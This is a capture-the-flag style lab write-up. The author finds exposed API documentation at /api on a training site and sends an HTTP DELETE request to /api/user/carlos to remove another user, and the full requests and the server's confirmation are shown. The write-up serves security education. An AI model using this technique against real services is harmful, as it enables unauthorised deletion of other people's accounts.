Exploiting an API endpoint using documentation

Description

To solve the lab, find the exposed API documentation and delete carlos. You can log in to your own account using the following credentials: wiener:peter.

Approach

After accessing the lab, I enabled the FoxyProxy extension to proxy all my requests through Burp Suite to check if there were any requests reaching an API. I found this interesting request responsible for updating the user's email:

PATCH /api/user/wiener HTTP/2
Host: 0aea008d0455e11280ddccf50093003e.web-security-academy.net
Cookie: session=p2yDPKo5YuSHESa19Iq1ws5aBLHJGCgk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

{"email":"qwe@qwe.com"}

This request reaches an endpoint /api/user/wiener. To start analyzing, I began investigating the following paths:

• /api/user/

• /api/

The one that caught my attention was /api, which provided full documentation on the API. This documentation included details on how to update the email, as shown above:

PATCH   *Verb*
/user/[username]  *Endpoint*
email: String    *Parameters*

I also discovered how to delete a user:

DELETE   *Verb*
/user/[username]  *Endpoint*

To proceed, I crafted this request to delete the user Carlos:

DELETE /api/user/carlos HTTP/2
Host: 0aea008d0455e11280ddccf50093003e.web-security-academy.net
Cookie: session=p2yDPKo5YuSHESa19Iq1ws5aBLHJGCgk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...

I received this response, confirming that the user was deleted:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 25

{"status":"User deleted"}

By deleting the Carlos user, the lab is solved.